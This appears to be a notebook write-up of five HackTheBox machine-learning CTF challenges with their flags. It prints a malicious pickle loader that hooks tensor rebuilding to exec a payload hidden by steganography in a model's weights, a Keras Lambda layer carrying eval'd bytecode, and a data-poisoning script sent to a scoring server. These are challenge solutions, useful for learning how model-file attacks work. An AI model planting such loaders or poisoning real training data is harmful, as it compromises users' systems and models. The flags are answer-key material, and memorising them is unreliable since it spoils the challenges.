# Machine Learning Challenges


### 1. Enchanted Weights

- **Level**: Easy
- **Description**
>In the depths of Eldoria's Crystal Archives, you've discovered a mystical artifact—an enchanted neural crystal named eldorian_artifact.pth. Legends speak of a hidden incantation—an ancient secret flag—imbued directly within its crystalline structure.
- **Files**: `eldorian_artifact.pth`


In [1]:
import warnings
warnings.filterwarnings("ignore", category=FutureWarning)

In [2]:
import torch

# Load the PyTorch model or artifact
file_path = "Enchanted Weights/eldorian_artifact.pth"
artifact = torch.load(file_path, map_location=torch.device('cpu'))

# Inspect the type and keys to understand the structure
artifact_type = type(artifact)
artifact_keys = artifact.keys() if isinstance(artifact, dict) else dir(artifact)
print(artifact_keys)


odict_keys(['hidden.weight'])


In [3]:
artifact['hidden.weight']

tensor([[72.,  0.,  0.,  ...,  0.,  0.,  0.],
        [ 0., 84.,  0.,  ...,  0.,  0.,  0.],
        [ 0.,  0., 66.,  ...,  0.,  0.,  0.],
        ...,
        [ 0.,  0.,  0.,  ..., 95.,  0.,  0.],
        [ 0.,  0.,  0.,  ...,  0., 95.,  0.],
        [ 0.,  0.,  0.,  ...,  0.,  0., 95.]])

The values on the diagonal look like ASCII codes: 72 is `H`, 84 is `T` and 66 is `B`, so the diagonal very likely spells out the flag.

In [4]:
weights = artifact['hidden.weight']
# Read the main diagonal, where each value is one ASCII code of the flag
recovered_flag = [int(weights[i][i]) for i in range(len(weights))]

flag = bytes(recovered_flag).decode()
print(flag)

HTB{Cry5t4l_RuN3s_0f_Eld0r1a}___________
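The trailing underscores are just the value 95 repeated along the rest of the diagonal, so they can be cut off at the closing brace. Here is a minimal sketch of the same decoding on a toy matrix built from plain Python lists; `decode_diagonal` and the toy data are my own names, not part of the challenge:

```python
def decode_diagonal(matrix):
    """Read the main diagonal as ASCII codes and cut the text after the closing brace."""
    codes = [int(matrix[i][i]) for i in range(len(matrix))]
    text = bytes(codes).decode("ascii")
    end = text.find("}")
    return text[: end + 1] if end != -1 else text


# Toy 6x6 matrix standing in for the real weights: "HTB{}" plus one padding value (95 = "_")
toy_codes = [72, 84, 66, 123, 125, 95]
toy = [
    [float(code) if row == col else 0.0 for col in range(len(toy_codes))]
    for row, code in enumerate(toy_codes)
]

print(decode_diagonal(toy))
```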


The **flag** is : `HTB{Cry5t4l_RuN3s_0f_Eld0r1a}`

--- 

### 2. Wasteland

- **Level**: Medium


- **Description**
>In the wake of Malakar’s betrayal and his dark conquest, many survivors across Eldoria fled into the Ashen Plains—a harsh wasteland cursed by dragon fire and shadow magic. A scattered refugee camp known as the Ashen Outpost has formed, where every survivor’s standing and respect among their peers is critical for survival. To ensure fairness, the Outpost's elders rely on mystical records known as the Ashen_Outpost_Records.csv, holding information on survivors' attributes such as resistance to dragonfire, known past crimes, and magical mutations from exposure to Malakar’s corrupted dragons. You are tasked with subtly manipulating these mystical records to elevate your standing (Survivor ID: 1337) within the Outpost—raising your reputation score above 60 to access critical resources without triggering the Elders' magical tampering alarms.


- **Files**: 
    - `Ashen_Outpost_Records.csv`
    - `solver_helper.py`


First, a look at `solver_helper.py` to see how submissions work:


```python
import requests

with open(f"Ashen_Outpost_Records.csv", "r") as f:
	r = requests.post("http://IP:PORT/score", files={"csv_file": f})
	print(r.text)

```

After some trial and error, it became clear that the values for Survivor 1337 cannot be changed. Instead, we have to adjust the other rows so that Survivor 1337's values look more favorable to the model.


In [5]:
import pandas as pd 

df = pd.read_csv("Wasteland/Ashen_Outpost_Records.csv")
original_length = len(df)
idx_1337 = df[df['SurvivorID'] == 1337].index[0]
survivor_1337 = df.loc[idx_1337].copy()
survivor_1337


SurvivorID               1337
Dragonfire_Resistance      66
Shadow_Crimes               3
Corruption_Mutations        2
Reputation                 55
Name: 30, dtype: int64

Based on these values, if we give all the other survivors the same feature values and set their Reputation to 100, the model should think "Oh cool, these values mean a great reputation!"
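To see why this kind of poisoning should work, here is a toy sketch. The server's model is not shown anywhere, so this uses a tiny nearest-neighbour regressor as a stand-in, and the "clean" records are made up for illustration. Only the target features `(66, 3, 2)` come from the real record.

```python
import math


def knn_predict(rows, features, k=3):
    """Average the reputation of the k rows whose features are closest to `features`."""
    by_distance = sorted(rows, key=lambda r: math.dist(r[:3], features))
    nearest = by_distance[:k]
    return sum(r[3] for r in nearest) / len(nearest)


target = (66, 3, 2)  # Survivor 1337's features from the record above

# Hypothetical clean records: (resistance, crimes, mutations, reputation)
clean = [(90, 0, 0, 85), (70, 2, 2, 58), (60, 4, 3, 45), (65, 3, 2, 52), (40, 6, 5, 20)]

# Poisoned copy: every other survivor gets the target's features and a reputation of 100
poisoned = [(*target, 100) for _ in clean]

print(knn_predict(clean, target))     # driven by the original neighbours
print(knn_predict(poisoned, target))  # every neighbour now says 100
```

Whatever model the Elders actually use, the idea is the same: if every training row with these features has a high label, the prediction for those features is pulled up.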

In [6]:
# Select every row except Survivor 1337 by ID instead of relying on its position
others = df['SurvivorID'] != 1337
df.loc[others, 'Dragonfire_Resistance'] = 66
df.loc[others, 'Shadow_Crimes'] = 3
df.loc[others, 'Corruption_Mutations'] = 2
df.loc[others, 'Reputation'] = 100  # Creating the bias

df.to_csv("Ashen_Outpost_Records.csv", index=False)

Finally, let's try sending this to the server:

In [10]:
import requests

with open(f"Ashen_Outpost_Records.csv", "r") as f:
	r = requests.post("http://94.237.61.100:30727/score", files={"csv_file": f})
	print(r.text)



Your reputation is [86.79369994]. Congratulations, survivor—you've gained the Elders' respect! Flag: HTB{4sh3n_D4t4_M4st3r}


The **flag** is : `HTB{4sh3n_D4t4_M4st3r}`

--- 

### 3. Crystal Corruption

- **Level**: Medium


- **Description**
>In the Library of Loria, an ancient crystal (resnet18.pth) containing a magical machine learning model was activated. Unknown to the mage who awakened it, the artifact had been tampered with by Malakar’s followers, embedding malicious enchantments. As Eldoria’s forensic mage, analyze the corrupted model file, uncover its hidden payload, and extract the flag to dispel the dark magic.

- **Files**: 
    - `resnet18.pth`


In [15]:
import torch

resnet_data = torch.load("Crystal Corruption/resnet18.pth", map_location="cpu",weights_only=False)
KEYS = list(resnet_data.keys())
set([k.split('.')[-1] for k in KEYS])

Connecting to 127.0.0.1
Delivering payload to 127.0.0.1
Executing payload on 127.0.0.1
You have been pwned!


{'bias', 'num_batches_tracked', 'running_mean', 'running_var', 'weight'}

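Okay, the keys show nothing unusual, but the `You have been pwned!` lines printed during `torch.load` mean that code ran while the file was being unpickled. A `.pth` file is a zip archive, so we can unzip it and check the `data.pkl` file inside: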

In [16]:
import pickle

with open("Crystal Corruption/data.pkl","rb") as inf:
    data = pickle.loads(inf.read())


UnpicklingError: A load persistent id instruction was encountered, but no persistent_load function was specified.
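The archive can also be inspected without unpickling anything. The sketch below is my own (`read_member` and `list_pickle_imports` are hypothetical helper names): it reads `data.pkl` straight out of the zip and walks the pickle opcodes with `pickletools.genops`, listing what the pickle would import. The `STACK_GLOBAL` handling is a heuristic, and the demo runs on a harmless in-memory archive rather than the challenge file.

```python
import collections
import io
import pickle
import pickletools
import zipfile


def read_member(archive_bytes, suffix="data.pkl"):
    """Return the bytes of the first zip member whose name ends with `suffix`."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        name = next(n for n in zf.namelist() if n.endswith(suffix))
        return zf.read(name)


def list_pickle_imports(pickle_bytes):
    """List module.name pairs a pickle would import, without unpickling it."""
    imports, strings = [], []
    for opcode, arg, _pos in pickletools.genops(pickle_bytes):
        if opcode.name == "GLOBAL":
            imports.append(arg.replace(" ", "."))
        elif opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Heuristic: the two most recent strings are the module and attribute names
            imports.append(f"{strings[-2]}.{strings[-1]}")
    return imports


# Toy archive standing in for the .pth file (a harmless pickled OrderedDict)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as zf:
    zf.writestr("archive/data.pkl", pickle.dumps(collections.OrderedDict(), protocol=4))

print(list_pickle_imports(read_member(buffer.getvalue())))
```

On a model file, any import that is not from `torch` or `collections` deserves a closer look.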

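Hmm. Plain `pickle` cannot load it, because PyTorch stores tensor data under persistent IDs that only `torch.load` resolves. Running `strings` on `data.pkl` in bash reveals this injected code: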

```python
import sys
import torch

def stego_decode(tensor, n=3):
    import struct
    import hashlib
    import numpy
    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
    payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes()
    (size, checksum) = struct.unpack("i 64s", payload[:68])
    message = payload[68:68+size]
    return message

def call_and_return_tracer(frame, event, arg):
    global return_tracer
    global stego_decode
    def return_tracer(frame, event, arg):
        if torch.is_tensor(arg):
            payload = stego_decode(arg.data.numpy(), n=3)
            if payload is not None:
                sys.settrace(None)
                exec(payload.decode("utf-8"))
    if event == "call" and frame.f_code.co_name == "_rebuild_tensor_v2":
        frame.f_trace_lines = False
        return return_tracer
sys.settrace(call_and_return_tracer)
```
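At its core, `stego_decode` is least-significant-bit steganography: with `n=3` it collects the lowest 3 bits of the least significant byte of every float32 and packs them back into bytes. Here is a pure-Python sketch of that idea as a round trip. It is my own simplification: `embed`, `extract` and `to_bits` are hypothetical names, little-endian float32 layout is assumed, and the 68-byte size/checksum header from the real payload is left out.

```python
import struct

N_BITS = 3  # low bits used per float32, matching n=3 in the recovered decoder


def to_bits(data):
    """Expand bytes into a list of bits, most significant bit first."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def embed(floats, message):
    """Hide `message` in the low N_BITS of each float32's least significant byte."""
    bits = to_bits(message)
    bits += [0] * (-len(bits) % N_BITS)  # pad to a whole number of chunks
    raw = bytearray(struct.pack(f"<{len(floats)}f", *floats))
    for k in range(len(bits) // N_BITS):
        chunk = bits[k * N_BITS:(k + 1) * N_BITS]
        value = int("".join(map(str, chunk)), 2)
        raw[4 * k] = (raw[4 * k] & 0b11111000) | value
    return list(struct.unpack(f"<{len(floats)}f", bytes(raw)))


def extract(floats, n_bytes):
    """Read `n_bytes` back out of the low N_BITS of each float32."""
    raw = struct.pack(f"<{len(floats)}f", *floats)
    bits = []
    for k in range(len(floats)):
        low = raw[4 * k] & 0b111
        bits += [(low >> (N_BITS - 1 - i)) & 1 for i in range(N_BITS)]
    return bytes(int("".join(map(str, bits[8 * j:8 * j + 8])), 2) for j in range(n_bytes))


weights = [0.1 * i for i in range(16)]  # toy "tensor"
stego = embed(weights, b"HTB")
print(extract(stego, 3))
print(max(abs(a - b) for a, b in zip(weights, stego)))  # change per weight is tiny
```

Because only the lowest mantissa bits change, the weights stay numerically almost identical, which is why the poisoned model still looks and behaves like a normal ResNet.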

We can reuse the recovered `stego_decode` to pull the hidden payload out of each tensor ourselves:

In [17]:
import struct
import numpy


def stego_decode(tensor, n=3):
    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
    payload = numpy.packbits(
        numpy.concatenate([
            numpy.vstack([
                bits[i::tensor.dtype.itemsize * 8] for i in range(8 - n, 8)
            ]).ravel("F")
        ])
    ).tobytes()
    size, checksum = struct.unpack("i 64s", payload[:68])
    message = payload[68:68+size]
    return message


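hidden_messages = []
for k, tensor in resnet_data.items():
    np_tensor = tensor.cpu().numpy()
    try:
        hidden_msg = stego_decode(np_tensor, n=3)
        if hidden_msg != b'':
            print(hidden_msg.decode())
            hidden_messages.append(hidden_msg)
    except Exception:
        # Tensors that cannot be decoded (e.g. too small for the 68-byte header) are skipped
        pass

The decoded payload is the script that ran when the model was loaded, with the flag in `hidden_flag`: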

import os

def exploit():
    connection = f"Connecting to 127.0.0.1"
    payload = f"Delivering payload to 127.0.0.1"
    result = f"Executing payload on 127.0.0.1"

    print(connection)
    print(payload)
    print(result)

    print("You have been pwned!")

hidden_flag = "HTB{n3v3r_tru5t_p1ckl3_m0d3ls}"

exploit()


The **flag** is : `HTB{n3v3r_tru5t_p1ckl3_m0d3ls}`

--- 

### 4. Malakar's Deception

- **Level**: Hard


- **Description**
>You recently recovered a mysterious magical artifact (malicious.h5) from Malakar's abandoned sanctum. Upon activation, the artifact began displaying unusual behaviors, suggesting hidden enchantments. As Eldoria’s expert mage in digital enchantments, it falls to you to carefully examine this artifact and reveal its secrets.

- **Files**: 
    - `malicious.h5`


In [None]:
from tensorflow.keras.models import load_model

file_path = "Malakar's Deception/malicious.h5"

try:
    model = load_model(file_path, compile=False)
    model_summary = []
    model.summary(print_fn=lambda x: model_summary.append(x))
    summary_text = "\n".join(model_summary)
except Exception as e:
    summary_text = f"Error loading model: {str(e)}"

print(summary_text[:2000])


That prints lots and lots of layers :( So I asked ChatGPT and was told to check the model config:

In [24]:
import h5py
import json

file_path = "Malakar's Deception/malicious.h5"


def extract_model_config_fixed(h5file_path):
    with h5py.File(h5file_path, 'r') as f:
        if 'model_config' in f.attrs:
            config_data = f.attrs['model_config']
            if isinstance(config_data, bytes):
                return json.loads(config_data.decode('utf-8'))
            else:
                return json.loads(config_data)
        else:
            return None

# Extract and return the model configuration
model_config = extract_model_config_fixed(file_path)
model_config.keys()

dict_keys(['class_name', 'config'])

In [18]:
model_config['config'].keys()

dict_keys(['name', 'trainable', 'layers', 'input_layers', 'output_layers'])

Next, check which layer types the model uses:

In [25]:
{layer['class_name'] for layer in model_config['config']['layers']}

{'Add',
 'BatchNormalization',
 'Conv2D',
 'Dense',
 'DepthwiseConv2D',
 'GlobalAveragePooling2D',
 'InputLayer',
 'Lambda',
 'ReLU',
 'ZeroPadding2D'}

The Lambda layer is the likely culprit, because:

>"A TensorFlow HDF5/H5 model may contain a "Lambda" layer, which contains embedded Python code in binary format. This code may contain malicious instructions which will be executed when the model is loaded."

[source](https://research.jfrog.com/model-threats/h5-lambda/)
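A flat search over `layers` is enough for this file. As a hedged sketch for configs where a Lambda might sit inside a nested sub-model, a recursive walk over the config dictionary could look like this (`find_lambda_layers` and the toy config are my own, not from the challenge):

```python
def find_lambda_layers(config):
    """Recursively collect every dict whose class_name is 'Lambda'."""
    found = []
    if isinstance(config, dict):
        if config.get("class_name") == "Lambda":
            found.append(config)
        for value in config.values():
            found.extend(find_lambda_layers(value))
    elif isinstance(config, list):
        for item in config:
            found.extend(find_lambda_layers(item))
    return found


# Toy config (hypothetical) with a Lambda hidden inside a nested sub-model
toy_config = {
    "class_name": "Functional",
    "config": {"layers": [
        {"class_name": "Dense", "config": {"name": "d1"}},
        {"class_name": "Functional", "config": {"layers": [
            {"class_name": "Lambda", "config": {"name": "hyperDense"}},
        ]}},
    ]},
}

print([layer["config"]["name"] for layer in find_lambda_layers(toy_config)])
```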

In [26]:
lambda_layers = [layer for layer in model_config['config']['layers'] if layer['class_name'] == 'Lambda']
len(lambda_layers),lambda_layers

(1,
 [{'class_name': 'Lambda',
   'config': {'name': 'hyperDense',
    'trainable': True,
    'dtype': {'module': 'keras',
     'class_name': 'DTypePolicy',
     'config': {'name': 'float32'},
     'registered_name': None},
    'function': {'class_name': '__lambda__',
     'config': {'code': '4wEAAAAAAAAAAAAAAAQAAAADAAAA8zYAAACXAGcAZAGiAXQBAAAAAAAAAAAAAGQCpgEAAKsBAAAA\nAAAAAAB8AGYDZAMZAAAAAAAAAAAAUwApBE4pGulIAAAA6VQAAADpQgAAAOl7AAAA6WsAAADpMwAA\nAOlyAAAA6TQAAADpUwAAAOlfAAAA6UwAAAByCQAAAOl5AAAAcgcAAAByCAAAAHILAAAA6TEAAADp\nbgAAAOlqAAAAcgcAAADpYwAAAOl0AAAAcg4AAADpMAAAAHIPAAAA6X0AAAD6JnByaW50KCdZb3Vy\nIG1vZGVsIGhhcyBiZWVuIGhpamFja2VkIScp6f////8pAdoEZXZhbCkB2gF4cwEAAAAg+h88aXB5\ndGhvbi1pbnB1dC02OS0zMjhhYjc5ODJiNGY++gg8bGFtYmRhPnIaAAAADgAAAHM0AAAAgADwAgEJ\nSAHwAAEJSAHwAAEJSAHlCAzQDTXRCDbUCDbYCAnwCQUPBvAKAAcJ9AsFDwqAAPMAAAAA\n',
      'defaults': None,
      'closure': None}},
    'output_shape': {'class_name': '__lambda__',
     'config': {'code': '4wEAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAHwAUw

In [27]:
function_code_lambda = lambda_layers[0]['config']['function']['config']['code']
function_code_lambda

'4wEAAAAAAAAAAAAAAAQAAAADAAAA8zYAAACXAGcAZAGiAXQBAAAAAAAAAAAAAGQCpgEAAKsBAAAA\nAAAAAAB8AGYDZAMZAAAAAAAAAAAAUwApBE4pGulIAAAA6VQAAADpQgAAAOl7AAAA6WsAAADpMwAA\nAOlyAAAA6TQAAADpUwAAAOlfAAAA6UwAAAByCQAAAOl5AAAAcgcAAAByCAAAAHILAAAA6TEAAADp\nbgAAAOlqAAAAcgcAAADpYwAAAOl0AAAAcg4AAADpMAAAAHIPAAAA6X0AAAD6JnByaW50KCdZb3Vy\nIG1vZGVsIGhhcyBiZWVuIGhpamFja2VkIScp6f////8pAdoEZXZhbCkB2gF4cwEAAAAg+h88aXB5\ndGhvbi1pbnB1dC02OS0zMjhhYjc5ODJiNGY++gg8bGFtYmRhPnIaAAAADgAAAHM0AAAAgADwAgEJ\nSAHwAAEJSAHwAAEJSAHlCAzQDTXRCDbUCDbYCAnwCQUPBvAKAAcJ9AsFDwqAAPMAAAAA\n'

In [28]:
output_shape_lambda = lambda_layers[0]['config']['output_shape']['config']['code']
output_shape_lambda

'4wEAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAHwAUwApAU6pACkB2gFzcwEAAAAg+h88aXB5dGhv\nbi1pbnB1dC02OS0zMjhhYjc5ODJiNGY++gg8bGFtYmRhPnIFAAAAFQAAAHMGAAAAgACYMYAA8wAA\nAAA=\n'

In [29]:
import base64

decoded_code = base64.b64decode(function_code_lambda)
print(decoded_code)

decoded_shape = base64.b64decode(output_shape_lambda)
print(decoded_shape)

b"\xe3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\xf36\x00\x00\x00\x97\x00g\x00d\x01\xa2\x01t\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x02\xa6\x01\x00\x00\xab\x01\x00\x00\x00\x00\x00\x00\x00\x00|\x00f\x03d\x03\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00)\x04N)\x1a\xe9H\x00\x00\x00\xe9T\x00\x00\x00\xe9B\x00\x00\x00\xe9{\x00\x00\x00\xe9k\x00\x00\x00\xe93\x00\x00\x00\xe9r\x00\x00\x00\xe94\x00\x00\x00\xe9S\x00\x00\x00\xe9_\x00\x00\x00\xe9L\x00\x00\x00r\t\x00\x00\x00\xe9y\x00\x00\x00r\x07\x00\x00\x00r\x08\x00\x00\x00r\x0b\x00\x00\x00\xe91\x00\x00\x00\xe9n\x00\x00\x00\xe9j\x00\x00\x00r\x07\x00\x00\x00\xe9c\x00\x00\x00\xe9t\x00\x00\x00r\x0e\x00\x00\x00\xe90\x00\x00\x00r\x0f\x00\x00\x00\xe9}\x00\x00\x00\xfa&print('Your model has been hijacked!')\xe9\xff\xff\xff\xff)\x01\xda\x04eval)\x01\xda\x01xs\x01\x00\x00\x00 \xfa\x1f<ipython-input-69-328ab7982b4f>\xfa\x08<lambda>r\x1a\x00\x00\x00\x0e\x00\x00\x00s4\x00\x00\x00\x80\x00\xf0\x02\x01\tH\x01\xf0\x00\x01\

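This is **Python bytecode**! More precisely, it is a code object serialized with `marshal`, which `marshal.loads` can turn back into something `dis` understands.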
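For context, this is roughly how a function ends up as such a base64 string. The sketch is a round trip with the standard library only; `dump_function` and `load_code` are hypothetical names of mine, and I am assuming Keras does something equivalent (marshal plus base64) when it saves a Lambda layer.

```python
import base64
import marshal
import types


def dump_function(func):
    """Serialize a function's code object to base64 text (marshal + base64)."""
    return base64.b64encode(marshal.dumps(func.__code__)).decode("ascii")


def load_code(encoded):
    """Recover the code object; this parses the bytecode but does not run it."""
    return marshal.loads(base64.b64decode(encoded))


encoded = dump_function(lambda x: x + 1)
code_obj = load_code(encoded)

# Only wrapping the code object in a function and calling it executes anything
rebuilt = types.FunctionType(code_obj, {})
print(type(code_obj).__name__, rebuilt(41))
```

Keep in mind that the `marshal` format is specific to the Python version, so a code object dumped by one interpreter version may not load or disassemble cleanly in another.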

In [30]:
import marshal
import dis

code_obj = marshal.loads(decoded_code)
dis.dis(code_obj)


 14           0 RESUME                   0

 15           2 BUILD_LIST               0
              4 LOAD_CONST               1 ((72, 84, 66, 123, 107, 51, 114, 52, 83, 95, 76, 52, 121, 51, 114, 95, 49, 110, 106, 51, 99, 116, 49, 48, 110, 125))
              6 LIST_EXTEND              1

 17           8 LOAD_GLOBAL              1 (NULL + eval)
             18 CACHE
             20 LOAD_CONST               2 ("print('Your model has been hijacked!')")
             22 UNPACK_SEQUENCE          1
             26 CALL                     1
             34 CACHE

 18          36 LOAD_FAST                0 (x)

 14          38 BUILD_TUPLE              3

 19          40 LOAD_CONST               3 (-1)

 14          42 BINARY_SUBSCR
             46 CACHE
             48 CACHE
             50 CACHE
             52 RETURN_VALUE


The `LOAD_CONST` at offset 4 loads the flag as a tuple of ASCII codes, since it starts with `72, 84, 66` (`HTB`). It is constant index 1 in `co_consts`:

In [31]:
flag = bytes(list(code_obj.co_consts[1])).decode()
print(flag)

HTB{k3r4S_L4y3r_1nj3ct10n}
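The same lookup can be done without knowing the constant's index. Here is a small sketch (`ascii_constants` is my own helper, and the demo lambda is made up) that scans a code object for tuple constants made only of printable ASCII codes:

```python
def ascii_constants(code_obj):
    """Yield decoded text for every tuple constant made only of printable ASCII codes."""
    for const in code_obj.co_consts:
        if (
            isinstance(const, tuple)
            and const
            and all(isinstance(c, int) and 32 <= c < 127 for c in const)
        ):
            yield bytes(const).decode("ascii")


# Demo code object: a lambda carrying a constant tuple, similar in shape to the challenge
demo_code = (lambda x: ((72, 84, 66, 123, 125), x)[-1]).__code__
print(list(ascii_constants(demo_code)))
```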


The **flag** is : `HTB{k3r4S_L4y3r_1nj3ct10n}`

--- 

### 5. Reverse Prompt

- **Level**: Hard


- **Description**
>A mysterious file (gtr_embeddings.npy) containing magical embeddings was found deep within ancient archives. To reveal its secret, you need to reverse-engineer the embeddings back into the original passphrase. Act quickly before the hidden magic fades away.

- **Files**: 
    - `gtr_embeddings.npy`

The file gtr_embeddings.npy is a NumPy file containing a 768-dimensional sentence embedding vector generated by a GTR (Generalist Text Representation) transformer model.

I wasn't sure where to start with this one, so I found this [page](https://til.simonwillison.net/python/gtr-t5-large) that talks about using faiss for fast indexing.


In [None]:
import faiss
import torch
print("FAISS:", faiss.__version__)
import numpy as np
from transformers import AutoTokenizer, AutoModel

file_path = 'Reverse Prompt/gtr_embeddings.npy'
all_embeddings = np.load(file_path).astype("float32")

tokenizer = AutoTokenizer.from_pretrained("sentence-transformers/gtr-t5-base")
model = AutoModel.from_pretrained("sentence-transformers/gtr-t5-base")
model.eval()



The plan is to generate embeddings for many candidate sentences and find the closest matches to the target embedding. I used a GPT to create potential phrases.
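"Closest" here means highest cosine similarity: once the vectors are normalized to unit length, the inner product used by `IndexFlatIP` is exactly the cosine. Here is a dependency-free sketch of that ranking on made-up 3-dimensional vectors (the real embeddings have 768 dimensions; `cosine` and `top_k` are my own names):

```python
import math


def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)


def top_k(target, candidates, k=2):
    """Return the k (phrase, score) pairs most similar to `target`, best first."""
    scored = [(phrase, cosine(target, vec)) for phrase, vec in candidates.items()]
    return sorted(scored, key=lambda item: item[1], reverse=True)[:k]


# Toy vectors, invented for illustration only
candidates = {
    "the secret passphrase": [0.9, 0.1, 0.2],
    "a dragon's hoard": [0.1, 0.9, 0.3],
    "secret": [0.7, 0.3, 0.1],
}
target = [1.0, 0.0, 0.2]

print(top_k(target, candidates))
```

For a few hundred phrases a brute-force loop like this would do; faiss mainly pays off when the candidate list gets large.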

In [33]:
def get_embeddings(texts):
    inputs = tokenizer(texts, padding=True, truncation=True, return_tensors="pt")
    with torch.no_grad():
        outputs = model.encoder(**inputs)
        last_hidden_state = outputs.last_hidden_state
        mask = inputs['attention_mask'].unsqueeze(-1).expand(last_hidden_state.shape).float()
        pooled = torch.sum(last_hidden_state * mask, dim=1) / torch.clamp(mask.sum(dim=1), min=1e-9)
    return pooled.cpu().numpy()

def gen_embedings(phrases,outname='Reverse Prompt/my_embeddings.npy'):
    embeddings = get_embeddings(phrases)
    np.save(outname, embeddings)

def gen_comparison(my_file='Reverse Prompt/my_embeddings.npy',target_name='Reverse Prompt/gtr_embeddings.npy'):
    # Load embeddings and normalize for cosine
    embeddings = np.load(my_file).astype("float32")
    faiss.normalize_L2(embeddings)
    index = faiss.IndexFlatIP(768)
    index.add(embeddings)
    # Load your target
    target = np.load(target_name).astype("float32")
    faiss.normalize_L2(target)
    D, I = index.search(target, k=5)
    return D,I



In [34]:
initial_phrases = open('Reverse Prompt/phrases_gpt.txt','r').read().strip().split('\n')
gen_embedings(initial_phrases)
D,I = gen_comparison()
results = [(initial_phrases[i],D[0][x]) for x,i in enumerate(I[0])]
print(results)


[('a "secret passphrase', 0.6919258), ('* a secret passphrase', 0.6737073), ('* A secret passphrase', 0.6725601), ('"A secret passphrase', 0.67214876), ('A secret passphrase was', 0.6315371)]


So the best matches all contain 'a secret passphrase'. We can refine this a little bit:

In [35]:
phrases = ['a secret passphrase', 'the secret passphrase', 'my secret passphrase', 'secret passphrase']
phrases = [x.capitalize() for x in phrases] + phrases
gen_embedings(phrases)
D,I = gen_comparison()
results = [(phrases[i],D[0][x]) for x,i in enumerate(I[0])]
print(results)


[('the secret passphrase', 0.7018439), ('secret passphrase', 0.6966969), ('The secret passphrase', 0.6962642), ('a secret passphrase', 0.69480723), ('Secret passphrase', 0.6894336)]


Alright, 'the secret passphrase' is an even closer match, but we need to refine it further. I asked GPT to generate a longer list of potential phrases, but this approach was way too resource intensive and caused a lot of crashes lol. I didn't solve this challenge during the CTF, so I'm going to use the official writeup for this part.

I don't have a GPU, so I had to modify it slightly to run on MPS or the CPU.

In [39]:
import vec2text


gtr_embeddings = np.load(file_path)
embedding = torch.from_numpy(gtr_embeddings).float()  # Convert to PyTorch tensor

device = torch.device("mps" if torch.backends.mps.is_available() else "cpu")
embedding = embedding.to(device)

corrector = vec2text.load_pretrained_corrector("gtr-base")



Loading checkpoint shards: 100%|██████████| 8/8 [00:01<00:00,  7.62it/s]
Loading checkpoint shards: 100%|██████████| 6/6 [00:00<00:00, 17.54it/s]


In [40]:
reconstructed_text = vec2text.invert_embeddings(
    embeddings=embedding,
    corrector=corrector,
    num_steps=20,  # More steps = better accuracy (but slower)
    sequence_beam_width=4,  # Wider beam = better results (but more memory)
)

print(reconstructed_text)

['           The secret passphrase is: terminalinit']


Now that we have the passphrase (`terminalinit`), we can connect to the server and send it to get the flag:


<img src="Reverse Prompt/flag.png" alt="flag" width="500">


The **flag** is : `HTB{AI_S3cr3ts_Unve1l3d}`